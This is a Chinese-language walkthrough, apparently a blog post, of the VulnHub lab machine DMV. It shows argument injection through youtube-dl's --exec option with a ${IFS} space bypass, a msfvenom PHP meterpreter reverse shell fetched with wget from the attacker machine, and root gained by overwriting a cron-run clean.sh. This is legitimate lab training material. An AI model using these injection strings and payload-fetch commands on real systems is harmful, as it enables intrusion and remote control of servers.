vulnhub靶机:DMV

靶机配置说明:

靶机下载地址:https://www.vulnhub.com/entry/dmv-1,462/
靶机:DMV (VirtualBox) IP:192.168.56.112
攻击机:Kali(VMware) IP:192.168.56.108

在下载地址中有详细的靶机说明,而DMV需要寻找的flag总数为2个。

靶机环境配置:

将靶机和kali都桥接到同一张网卡即可,这里我都桥接到virtualBox的Host-only网卡,保证无干扰目标。
在这里插入图片描述
在这里插入图片描述

确定目标ip:

确定目标ip,这里我使用netdiscover或者arp-scan -l探测目标IP,比较快。
netdiscover:
在这里插入图片描述
arp-scan -l:
在这里插入图片描述
根据靶机的MAC地址等信息可确认目标ip为192.168.56.112

接着通过nmap进行常规的信息探测、端口扫描:

nmap -A -sC -sV -p- 192.168.56.112

在这里插入图片描述
可以看到开放了22、80端口
直接访问80端口,http://192.168.56.112
在这里插入图片描述
在这里插入图片描述
好像是一个通过youtube视频ID号转mp3的一个网页
抓包查看其数据返回包
在这里插入图片描述
发现报错信息,谷歌找一下其报错信息在这里插入图片描述
在这里插入图片描述
发现转换视频格式是用一个python脚本来完成的
https://github.com/ytdl-org/youtube-dl
我们可以看到脚本的执行选项

youtube-dl [OPTIONS] URL [URL...]

在这里插入图片描述
可以看到在URL前面是可以添加参数选项的
我们验证一下,在url前面加上-h选项
在这里插入图片描述
发现他将帮助信息打印出来了

而在后面的后操作选项中,我们看到有一个–exec选项
在这里插入图片描述
我们尝试执行–exec选项
在这里插入图片描述
发现–exec后面的内容被截断了,猜测估计是根据空格来进行截断的
在这里插入图片描述
猜测没错,那么直接将空格去掉试试

yt_url=--exec'whoami'

在这里插入图片描述
但是并不能执行,测试将引号改成反引号

yt_url=--exec`whoami`

在这里插入图片描述
成功执行命令,这里估计连引号也被过滤了
在尝试是否能执行其他内容,查看下/etc/passwd的内容,由于空格被过滤了,所以,这里需要用其他方式绕过,比如%0a、%0b、%09、${IFS}

显示的结果很明显不全。。就显示返回结果的几个字符

yt_url=--exec`cat${IFS}/etc/passwd`

在这里插入图片描述
不管,能执行命令就行,直接弹一个shell回来
这里测试可以发现wget是可以用的

yt_url=--exec`wget${IFS}-h`

在这里插入图片描述
那么我们就可以利用wget来下载后门
先生成一个后门,这里我使用msfvenom来生成后门

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.108 LPORT=8888 -f raw -o shell.php

在这里插入图片描述
在这里插入图片描述
生成木马后,在MSF中设置监听:

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.56.108
set LPORT 8888
run -j

在这里插入图片描述
接着利用python在shell.php的路径开一个小型的http服务
python2:

python -m SimpleHTTPServer 1000

python3:

python3 -m http.server 1000

在这里插入图片描述
在命令执行处使用wget去下载kali的后门

yt_url=--exec`wget${IFS}http://192.168.56.108:1000/shell.php`

在这里插入图片描述
在这里插入图片描述

下载完成后,再任意形式访问下后门来触发shell
在这里插入图片描述
msf成功拿到一个meterpreter会话。
在这里插入图片描述
进入shell,并切换到交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述
成功拿到第一个flag:/var/www/html/admin/flag.txt
在这里插入图片描述
/var/www/html/tmp目录下发现一个clean.sh
在这里插入图片描述
也没有权限执行
在这里插入图片描述
这里需要使用PSPY来检测后台的root进程
pspy: https://github.com/DominicBreuker/pspy/releases
将pspy通过wget上传上去
在这里插入图片描述
执行,发现没权限
在这里插入图片描述
给个执行权限就好了
在这里插入图片描述
可以看到clean.sh是通过root权限执行的
在这里插入图片描述
可以发现我们是有写的权限的尝试通过
那我们可以尝试写一个反弹shell回来,拿到root权限
kali上开启监听:
在这里插入图片描述
写入反弹:
在这里插入图片描述
在这里插入图片描述

成功弹回shell,我们切换到交互式shell
在这里插入图片描述
在/root目录下找到第二个flag
在这里插入图片描述

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值